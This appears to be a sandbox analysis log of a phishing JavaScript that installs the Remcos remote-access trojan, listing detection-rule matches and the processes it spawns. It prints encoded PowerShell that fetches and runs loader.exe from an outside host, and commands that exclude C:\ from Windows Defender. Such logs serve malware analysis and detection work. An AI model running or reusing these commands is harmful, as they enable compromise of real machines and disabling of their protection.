Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.bank.troj.spyw.expl.evad.winJS@32/22@10/3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 20_2_00417AD9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C888EA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 20_2_06C888EA
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF7B28 GetDiskFreeSpaceA, 14_2_02FF7B28
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03007B90 CreateToolhelp32Snapshot, 14_2_03007B90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource, 20_2_0041B9AB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 20_2_0041AC43
Source: C:\Users\user\AppData\Local\Temp\loader.exe File created: C:\Users\All Users\5058.cmd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\SysWOW64\colorcpl.exe Mutant created: \Sessions\1\BaseNamedObjects\makwin-04NDKU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncizkrmy.r5g.ps1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Payment reference no. - FT910298955674.js Virustotal: Detection: 22%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment reference no. - FT910298955674.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Payment reference no. - FT910298955674.js" /elevate
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\loader.exe "C:\Users\user~1\AppData\Local\Temp\loader.exe"
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5058.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\39949.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown Process created: C:\Users\user\Links\Xdnxwtne.PIF "C:\Users\user\Links\Xdnxwtne.PIF"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Links\Xdnxwtne.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA== Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA== Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\loader.exe "C:\Users\user~1\AppData\Local\Temp\loader.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5058.cmd"" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\39949.cmd"" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
